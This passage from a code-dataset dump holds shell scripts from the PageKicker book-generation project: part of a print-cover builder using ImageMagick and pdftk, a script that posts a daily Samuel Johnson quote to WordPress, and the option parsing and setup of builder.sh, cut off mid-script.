$frontpagebottomcushion\n\n\t# back page calculations\n\n\t\tISBNylocation=$(( $safepageheight - 300 - 25 ))\n\t\tISBNxlocation=$(( $outsidebleed + 125 ))\n\n\t\techo \"calculated ISBNxlocation as\" $ISBNxlocation\n\t\techo \"calculated ISBNylocation as\" $ISBNylocation\n\n\n\t# start by building the full canvas\n\n\t\tconvert -size \"$canvaswidth\"x\"$canvasheight\" xc:$newcovercolor \\\n\t\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\t\timages/$uuid/print/fullcanvas.png\n\n\n\t# then create the front cover\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_vertical_trim\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/canvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/topcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/bottomcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$newcovercolor images/$uuid/print/toplabel.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$newcovercolor 
images/$uuid/print/bottomlabel.png\n\n\n\t# underlay the Word Cloud cover (which was created during the ebookcover build)\n\n\tcomposite -gravity Center images/$uuid/ebookcover/$sku\"printcloud.png\" images/$uuid/print/canvas.png images/$uuid/print/canvas.png\n\n\t# build the labels for the front cover\n\n\t\techo \"covertitle is\" $covertitle\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_top_height\" \\\n\t\t\t-font $newcoverfont caption:\"$covertitle\" \\\n\t\t\t-density 300 -units pixelsperinch\\\n\t\t\t\t images/$uuid/print/topcanvas.png +swap -gravity center -composite images/$uuid/print/toplabel.png\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_bottom_height\" \\\n\t\t -font $newcoverfont caption:\"$editedby\" \\\n\t\t-density 300 -units pixelsperinch\\\n\t\t images/$uuid/print/bottomcanvas.png +swap -gravity center -composite images/$uuid/print/bottomlabel.png\n\n\t# lay the labels on top of the front cover\n\t\tcomposite -geometry +0+0 images/$uuid/print/toplabel.png images/$uuid/print/canvas.png images/$uuid/print/step1.png\n\t\tcomposite -geometry +0+$print_horizontal_trim images/$uuid/print/bottomlabel.png images/$uuid/print/step1.png images/$uuid/print/step2.png\n\t\tcomposite -gravity south -geometry +0+0 assets/PageKicker_cmyk300dpi_300.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\n\t# make a working copy of the front cover\n\n\t\tcp images/$uuid/print/cover.png images/$uuid/print/$sku\"printfrontcover.png\"\n\n\t# make PDF and EPS copies of the front cover\n\t\tconvert images/$uuid/print/$sku\"printfrontcover.png\" -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\"\n\t\tconvert -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\" images/$uuid/print/$sku\"printfrontcover.eps\"\n\n\t# replace first page of interior with print cover page\n\n\t\tpdftk A=$mediatargetpath$uuid/$sku\"print.pdf\" B=\"images/\"$uuid/print/$sku\"printfrontcover.pdf\" cat B1 A2-end output $mediatargetpath$uuid/$sku\"finalprint.pdf\"\n\n\t# build the ISBN\n\n\tpython $scriptpath\"lib/bookland-1.4/bookland-1.4.1b\" -o images/$uuid/print/$userprovidedprintISBN.eps -f OCRB -b 1 -q --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\t\n\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 25x25 -bordercolor white images/$uuid/print/$userprovidedprintISBN.eps -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.png\n\n\t# build the spine caption\n\n\techo \"building spine caption\"\n\n\tconvert -size \"$safespinetitleheight\"x\"$safespinetitlewidth\" -density 300 -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"$covertitle\" images/$uuid/print/spinecaption.png\n\n\t# build the spine logotype\n\n\techo \"building spine logotype\"\n\n\tconvert -size \"$safespinetitleheight\"x\"$safespinetitlewidth\" -density 300 -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity East caption:\"PageKicker\" images/$uuid/print/spinelogotype.png\n\n\n# lay the objects on the canvas\n\n\n\t\n\t# lay the ISBN box at the bottom left corner of the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas.png \\\n\t\timages/$uuid/print/$userprovidedprintISBN.png -geometry +$ISBNxlocation+$ISBNylocation -composite \\\n\t\timages/$uuid/print/fullcanvas1.png \n\n\t# lay the front cover on the full 
canvas\n\n\t\tconvert images/$uuid/print/fullcanvas1.png \\\n\t\timages/$uuid/print/$sku\"printfrontcover.png\" -geometry +$frontpageflushleftmargin+$topbleed -composite \\\n\t\timages/$uuid/print/fullcanvas2.png\n\n# assemble and lay down the spine caption and logotype, unless it is too thin\n\n\tif [ \"$pdfpagecount\" -lt 48 ]; then\n\n\t\techo \"page count too low for spine\"\n\t\tcp images/$uuid/print/fullcanvas2.png images/$uuid/print/finalcanvas.png\n\n\telse\n\n\t\t# lay the spine caption on the full canvas\n\n\t\t\tconvert images/$uuid/print/fullcanvas2.png \\\n\t\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+375 -composite \\\n\t\t\timages/$uuid/print/fullcanvas3.png\n\n\n\t\t# resize the purple bird \n\t\t\tpurplebirdsize=$(( $safespinetitlewidth - 20 ))\n\t\t\tconvert assets/purplebird300.png -resize \"$purplebirdsize\"x\"$purplebirdsize\"\\> images/$uuid/print/purple$safespinetitlewidth.png\n\n\t\t# surround the bird with a white box\n\n\t\t\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 5x5 -bordercolor white images/$uuid/print/purple$safespinetitlewidth.png -colorspace CMYK images/$uuid/print/purplebirdwithbox.png\n\n\t\t# create spacer box\n\n\t\tconvert -size \"$safespinetitlewidth\"x20 xc:none images/$uuid/print/spacer.png\n\n\t\t# append spine logotype, spacer, and purplebird box\n\n\t\tconvert images/$uuid/print/spinelogotype.png images/$uuid/print/spacer.png -background none -gravity west -append images/$uuid/print/logowithspacer.png\n\t\tconvert images/$uuid/print/logowithspacer.png images/$uuid/print/purplebirdwithbox.png -background none -gravity west -append images/$uuid/print/logobar.png\n\n\t\t# lay the spine logotype on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas3.png \\\n\t\timages/$uuid/print/logobar.png -geometry +$spineleftmargin+$spinelogotypebegin -composite \\\n\t\timages/$uuid/print/fullcanvas4.png\n\n\t\tcp images/$uuid/print/fullcanvas4.png images/$uuid/print/finalcanvas.png\n\n\n\tfi\n\n\t\n# save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\tconvert images/$uuid/print/finalcanvas.png -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.pdf\n\n\techo \"built print cover as file images/$uuid/print/$userprovidedprintISBN.pdf\" | tee --append $sfb_log\n\nxvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".pdf\" --cover \"images/\"$uuid\"/print/\"$sku\"printfrontcover.png\" --margin-left \"54\" --margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"11\" --pdf-page-numbers --insert-metadata --pdf-serif-family \"AvantGarde\" --title \"$covertitle\"\n\necho \"saving interior as PDFx1a\"\n\n# -B flag makes it b&w\n\n./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o $mediatargetpath$uuid/$userprovidedprintISBN.pdf $mediatargetpath$uuid/$sku.pdf\n" }, { "alpha_fraction": 0.6861516833305359, "alphanum_fraction": 0.693806529045105, "avg_line_length": 34.92499923706055, "blob_id": "645c5a7aed6f59c3dbc92e7b1500013f2139157f", "content_id": "7af6dff75162f8c136bb8d25a541af0c104ed651", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1437, "license_type": "permissive", "max_line_length": 185, "num_lines": 40, "path": "/scripts/includes/daily-wp-post.sh", "repo_name": "fredzannarbor/pagekicker-community", 
"src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. \"$HOME\"/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\necho \"creating daily wordpress post\"\necho \"$TMPDIR$uuid\"\nexit 0\nmkdir -m 775 -p \"$TMPDIR$uuid/\"daily-wordpress-post\"\n\necho \"## Today's Dose of Samuel Johnson\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '<blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"$(fortune johnson)\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '</blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\nwotd=$(fortune johnson | head -n 1 | cut -d\" \" -f1)\n\npandoc -s -o \"$TMPDIR$uuid/daily-email/daily-email.html\" \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n\"$WP_BIN\" post create \"$TMPDIR$uuid/daily-email/daily-email.html\" --post_type=post --post_status=\"$daily_email_post_to_wp_status\" --post_title=\"Samuel Johnson WOTD: $wotd\" --post_mime_type=html\n" }, { "alpha_fraction": 0.6747154593467712, "alphanum_fraction": 0.6840386986732483, "avg_line_length": 25.75137710571289, "blob_id": "dfbcdbaa661614f018adeb4fce35859134a7cc2e", "content_id": "229291dda884f07210242f24f1567dfd7928dbbf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 34001, "license_type": "permissive", "max_line_length": 247, "num_lines": 1271, "path": "/scripts/builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# accepts book topic and book type definition, then builds book\n\nloguuid=$(python -c 'import uuid; print(uuid.uuid1())')\n\nmkdir /tmp/pagekicker/\"$loguuid\"\n\ntouch /tmp/pagekicker/\"$loguuid\"/log\n\n# exec redirect below begins a rather convoluted process that is necessary to enable\n# the operation of a --verbose flag\n\nexec 3>&1 >> /tmp/pagekicker/\"$loguuid\"/startuplog\n\n\necho \"builder begins\"\necho \"\"\necho \"received from command line: \"\necho \"$@\"\necho \"\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. \"$HOME\"/.pagekicker/config.txt #hard-code here to have a nonlogin shell run the script\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. 
includes/set-variables.sh\n\necho \"shortform is $shortform\"\n\necho \"revision number is\" $SFB_VERSION\necho \"sfb_log is\" $logdir\"sfb_log\"\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'`\n\nexport PERL_SIGNALS=\"unsafe\"\necho \"PERL_SIGNALS\" is $PERL_SIGNALS \"UNSAFE is correct\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\nexec 1>&3\necho \"version $SFB_VERSION\"\ncat assets/builder-help.txt | more\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--verbose|-v)\nexec 1>&3\necho \"verbose on\"\ncat /tmp/pagekicker/$loguuid/startuplog\nshift\n;;\n-U|--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n-s|--seedfile)\nseedfile=$2\nshift 2\n;;\n--seedfile=*)\nseedfile=${1#*=}\nshift\n;;\n-t|--booktype)\nbooktype=$2\nshift 2\n;;\n--booktype=*)\nbooktype=${1#*=}\nshift\n;;\n-T|--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n-G|--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n-S|--singleseed|s)\nsingleseed=$2\nshift 2\n;;\n--singleseed=*)\nsingleseed=${1#*=}\nshift\n;;\n--truncate_seed)\ntruncate_seed=$2\nshift 2\n;;\n--truncate_seed=*)\nshift\ntruncate_seed=${1#*=}\n;;\n-w|--sample_tweets)\nsample_tweets=$2\nshift 2\n;;\n--sample_tweets=*)\nshift\nsample_tweets=${1#*=}\n;;\n-f|--ebook_format)\nebook_format=$2\nshift 2\n;;\n--ebook_format=*)\nshift\nebook_format=${1#*=}\n;;\n-J|--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--jobprofile)\njobprofile=$2\nshift 2\n;;\n--jobprofile=*)\njobprofile=${1#*=}\nshift\n;;\n-L|--wikilang)\nwikilang=$2\nshift 2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n-M|--summary)\nsummary=$2\nshift 2\n;;\n--summary=*)\nsummary=${1#*=}\nshift\n;;\n-n|--safe_product_name)\nsafe_product_name=$2\nshift 2\n;;\n--safe_product_name=*)\nsafe_product_name=${1#*=}\nshift\n;;\n-F|--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n-L|--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--fromccc)\nfromccc=$2\nshift 2\n;;\n--fromccc=*)\nfromccc=${1#*=}\nshift\n;;\n-b|--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n-b|--byline)\neditedby=$2\nshift 2\n;;\n--byline=*)\neditedby=${1#*=}\nshift\n;;\n-Y|--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n-N|--customername)\ncustomername=$2\nshift 2\n;;\n--customername=*)\ncustomername=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--shortform)\nshortform=$2\nshift 2\n;;\n--shortform=*)\nshortform=${1#*=}\nshift\n;;\n--flickr)\nflickr=$2\nshift 2\n;;\n--flickr=*)\nflickr=${1#*=}\nshift\n;;\n--dontcleanupseeds)\ndontcleanupseeds=$2\nshift 2\n;;\n--dontcleanupseeds=*)\ndontcleanupseeds=${1#*=}\nshift\n;;\n-u|--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n-I|--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n-l|--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n--subtitle)\nsubtitle=$2\nshift 2\n;;\n--subtitle=*)\nsubtitle=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corpora=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 
2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n--mailtoadmin)\nmailtoadmin=$2\nshift 2\n;;\n--mailtoadmin=*)\nmailtoadmin=${1#*=}\nshift\n;;\n--buildcover)\nbuildcover=$2\nshift 2\n;;\n--buildcover=*)\nbuildcover=${1#*=}\nshift\n;;\n--add_this_content)\nadd_this_content=$2\nshift 2\n;;\n--add_this_content=*)\nadd_this_content=${1#*=}\nshift\n;;\n--add_this_content_part_name)\nadd_this_content_part_name=$2\nshift 2\n;;\n--add_this_content_part_name=*)\nadd_this_content_part_name=${1#*=}\nshift\n;;\n--content_collections)\ncontent_collections=$2\nshift 2\n;;\n--content_collections=*)\ncontent_collections=${1#*=}\nshift\n;;\n--expand_seeds_to_pages)\nexpand_seeds_to_pages=$2\nshift 2\n;;\n--expand_seeds_to_pages=*)\nexpand_seeds_to_pages=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper=${1#*=}\nshift\n;;\n--add_this_image)\nadd_this_image=$2\nshift 2\n;;\n--add_this_image=*)\nadd_this_image=${1#*=}\nshift\n;;\n--add_this_image_name)\nadd_this_image_name=$2\nshift 2\n;;\n--add_this_image_name=*)\nadd_this_image_name=${1#*=}\nshift\n;;\n--seedsviacli)\nseedsviacli=$2\nshift 2\n;;\n--seedsviacli=*)\nseedsviacli=${1#*=}\nshift\n;;\n--googler_on)\ngoogler_on=$2\nshift 2\n;;\n--googler_on=*)\ngoogler_on=${1#*=}\nshift\n;;\n--googler_news_on)\ngoogler_news_on=$2\nshift 2\n;;\n--googler_news_on=*)\ngoogler_news_on=${1#*=}\nshift\n;;\n--kindlegen_on)\nkindlegen_on=$2\nshift 2\n;;\n--kindlegen_on=*)\nkindlegen_on=${1#*=}\nshift\n;;\n--screen_numbered_seeds)\nscreen_numbered_seeds=$2\nshift 2\n;;\n--screen_numbered_seeds=*)\nscreen_numbered_seeds=${1#*=}\nshift\n;;\n--seedfortheday)\nseedfortheday=$2\nshift 2\n;;\n--seedfortheday=*)\nseedfortheday=${1#*=}\nshift\n;;\n--daily_email_post_to_wp)\ndaily_email_post_to_wp=$2\nshift 2\n;;\n--daily_email_post_to_wp=*)\ndaily_email_post_to_wp=${1#*=}\nshift\n;;\n--daily_email_post_to_wp_status)\ndaily_email_post_to_wp_status=$2\nshift 2\n;;\n--daily_email_post_to_wp_status=*)\ndaily_email_post_to_wp_status=${1#*=}\nshift\n;;\n--search_engine_registry)\nsearch_engine_registry=$2\nshift 2\n;;\n--search_engine_registry=*)\nsearch_engine_registry=${1#*=}\nshift\n;;\n--mediawiki_api_url)\nmediawiki_api_url=$2\nshift 2\n;;\n--mediawiki_api_url=*)\nmediawiki_api_url=${1#*=}\nshift\n;;\n--url_prefix)\nurl_prefix=$2\nshift 2\n;;\n--url_prefix=*)\nurl_prefix=${1#*=}\nshift\n;;\n--wikipath)\nwikipath=$2\nshift 2\n;;\n--wikipath=*)\nwikipath=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\necho \"loaded options\"\n\n\necho \"LOCAL_DATA is $LOCAL_DATA\"\n\necho \"add_this_content is $add_this_content\"\n\necho \"imprint is $imprint\"\necho \"editedby is $editedby\"\necho \"jobprofilename is $jobprofilename\"\n\nhuman_author=\"$editedby\"\n# Suppose some options are required. Check that we got them.\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"using loguuid\"\n\t#uuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\tuuid=$loguuid\n\techo \"uuid is\" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nfi\n\n# create directories I will need\n\nmkdir -p -m 755 \"$TMPDIR$uuid/actual_builds\"\nmkdir -p -m 755 \"$TMPDIR$uuid/apis\"\nmkdir -p -m 755 \"$TMPDIR$uuid/cover\"\nmkdir -p -m 755 \"$TMPDIR$uuid/twitter\"\nmkdir -p -m 777 \"$TMPDIR$uuid/fetch\"\nmkdir -p -m 777 \"$TMPDIR$uuid/flickr\"\nmkdir -p -m 777 \"$TMPDIR$uuid/images\"\nmkdir -p -m 777 \"$TMPDIR$uuid/mail\"\nmkdir -p -m 777 \"$TMPDIR$uuid/content_collections\"\nmkdir -p -m 777 \"$TMPDIR$uuid/search_engine_results\"\nmkdir -p -m 777 \"$TMPDIR$uuid/seeds\"\nmkdir -p -m 777 \"$TMPDIR$uuid/user\"\nmkdir -p -m 777 \"$TMPDIR$uuid/wiki\"\nmkdir -p -m 777 \"$TMPDIR$uuid/webseeds\"\n\nmkdir -p -m 755 -p $LOCAL_DATA\"jobprofile_builds/\"\"$jobprofilename\"\n\necho \"search engine registry is\" \"$search_engine_registry\"\n\n\nif [ -z \"$covercolor\" ]; then\n\tcovercolor=\"RosyBrown\"\n\techo \"no cover color in command line so I set it to \"$covercolor\nelse\n\techo \"cover color is $covercolor\"\nfi\n\nif [ -z \"$coverfont\" ]; then\n\tcoverfont=\"Minion\"\n\techo \"no cover font in command line so I set it to \"$coverfont\nelse\n\techo \"cover font is $coverfont\"\nfi\n\nif [ -z \"$wikilang\" ]; then\n\twikilang=\"en\"\n\techo \"no wikilang in command line so I set it to \"$wikilang\nelse\n\techo \"wiki search language is $wikilang\"\nfi\n\nif [ -z \"$imprint\" ]; then\n\timprint=\"default\"\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\nelse\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\nfi\n\nif [ -z \"$jobprofilename\" ]; then\n\tjobprofilename=\"$jobprofile\"\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nelse\n\t. 
\"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nfi\n\nTEXTDOMAIN=SFB\necho $\"hello, world, I am speaking\" $LANG\n\nsafe_product_name=$(echo \"$booktitle\"| sed -e 's/[^A-Za-z0-9._-]/_/g')\necho \"safe product name is\" $safe_product_name\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku is\" $sku\n\n\necho \"test $covercolor\" \"$coverfont\"\n\n# resolving seedfile from command line\n\necho \"getting path to seedfile from command line\"\nif [ -z \"$seedfile\" ] ; then\n\techo \"no seedfile provided\"\n\t\tif [ -z \"$singleseed\" ] ; then\n\t\t\techo \"no singleseed provided\"\n\t\t\t\tif [ -z \"$seedsviacli\" ] ; then\n\t\t\t\t\techo \"no seedsviacli provided\"\n\t\t\t\t\techo \"exiting because no seeds provided\"\n\t\t\t\t\texit 0\n\t\t\t\telse\n\t\t\t\t\techo \"semi-colon seeds provided via command line\"\n\t\t\t\t\techo \"$seedsviacli\" | sed -e 's/; /;/g' -e $'s/;/\\\\\\n/g' > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\t\tfi\n\t\telse\n\t\t\tseed=\"$singleseed\"\n\t\t\techo \"seed is now singleseed\" \"$seed\"\n\t\t\techo \"$singleseed\" > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\tfi\nelse\n\t echo \"path to seedfile was $seedfile\"\n\t\tcp $seedfile \"$TMPDIR$uuid/seeds/seedphrases\"\nfi\necho \"seedfile is $seedfile\"\n\nif [ -z \"$booktitle\" ] ; then\n\techo \"no booktitle provided by operator\"\n\n seedcount=`cat $TMPDIR$uuid/seeds/seedphrases | tr '\\n' ' ' | wc -l | tr -d ' '`\n\techo \"seedcount is $seedcount\"\n\tif [ \"$seedcount\" -gt \"1\" ] ; then\n\t\tbooktitle=$(head -n 1 \"$TMPDIR$uuid/seeds/seedphrases\")\" and more\"\n\t\t\techo \"arbitrary booktitle is $booktitle\"\n\telse\n\t\tbooktitle=$(head -n 1 \"$TMPDIR$uuid/seeds/seedphrases\")\n\t\techo \"arbitrary booktitle is $booktitle\"\n\tfi\nelse\n\techo \"booktitle provided via command line is $booktitle\"\nfi\n\n. 
includes/api-manager.sh\n\n\n#move assets into position\n\n#if [ \"$truncate_seed\" = \"yes\" ] ; then\n#\techo \"truncating path to seed file\"\n#\techo $seedfile\n#\tseedfile=$(dirname $seedfile)\n#\tseedfile=$seedfile\"/seedlist\"\n#\techo \"truncated seedfile\" $seedfile \" as kluge for var customer path\"\n#else\n#\techo \"not truncating seedfile\"\n#fi\n\n#echo \"seedfile is \" $seedfile\n#ls -lart \"seedfile is\" $seedfile\n\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\n\n#if cmp -s \"$seedfile\" \"$TMPDIR\"$uuid\"/seeds/seedphrases\" ; then\n#\techo \"seedfiles are identical, no action necessary\"\n#else\n#\techo \"Rotating new seedfile into tmpdir\"\n#\tcp \"$seedfile\" \"$TMPDIR\"$uuid\"/seeds/seedphrases\"\n#fi\n\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"\"$uuid\"\ncp $confdir\"jobprofiles\"/signatures/\"$sigfile\" \"$TMPDIR\"\"$uuid\"\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid\"/cover\"\n\n# create placeholder seedfortheday file\n\ntouch \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n\n# extracts seeds from analyzed webpage\n\nif [ -z ${analyze_url+x} ] ; then\n\techo \"analyze_url is not set\"\nelse\n\tif [[ $analyze_url =~ $httpvalidate ]] ; then\n\t\techo \"$analyze_url is valid URI\"\n\t\techo \"analyze_url is set as $analyze_url\"\n\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/webpage.md\"\n\t\t#\"$PYTHON27_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/webpage.md\" \"$TMPDIR\"$uuid\"/webseeds\" \"$uuid\"\n\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$TMPDIR\"$uuid\"/webpage.md\" -outputFormat tabbedEntities > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcd $scriptpath && echo \"seeds have been extracted from analyze_url\"\n\t\thead -n \"$top_q\" \"$TMPDIR\"$uuid\"/webseeds\" | sed '/^\\s*$/d' > \"$TMPDIR\"$uuid\"/webseeds.top_q\"\n\t\tcat \"$TMPDIR\"$uuid\"/webseeds.top_q\" > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/webseeds\") <(sort \"locale/stopwords/webstopwords.en\") >> \"$TMPDIR\"$uuid/seeds/seedphrases\n\telse\n\t\techo \"invalid URI, analyze_url not added\"\n\tfi\nfi\n\n# creates sorted & screened list of seeds\nif [ \"$screen_numbered_seeds\" = \"yes\" ] ; then\n\tsort -u --ignore-case \"$TMPDIR$uuid/seeds/seedphrases\" \t| sed -e '/^$/d' -e '/^[0-9#@]/d' > \"$TMPDIR\"$uuid/seeds/sorted.seedfile\n\techo \"screened out seeds beginning with 0-9, #, @\"\nelse\n\tsort -u --ignore-case \"$TMPDIR$uuid/seeds/seedphrases\" > \"$TMPDIR\"$uuid/seeds/sorted.seedfile\nfi\n\necho \"---\"\necho \"seeds are\"\ncat \"$TMPDIR$uuid/seeds/sorted.seedfile\"\necho \"---\"\n\n# look at $search_engine_registry\n\n\n# decides what additional search engines will be used\n\n# loops over searches\n\nwhile IFS=, read -r search_engine_on search_plugin_path search_credentials\ndo\n echo \"I got:\" \"$search_engine_on\" \"$search_plugin_path\" \"$search_credentials\"\n\t\tif [ \"$search_engine_on\" = \"yes\" ] ; then\n\t\t echo \"test $search_plugin_path\"\n\t\t\t \"$search_plugin_path\"\n\t else\n\t\t\techo \"not running search plugin $search_plugin_path\"\n\t\t\ttouch \"$TMPDIR$uuid/search_engine_content.md\"\n\t\tfi\ndone < \"$search_engine_registry\"\n\n# Wikipedia search is on by default\n\n. 
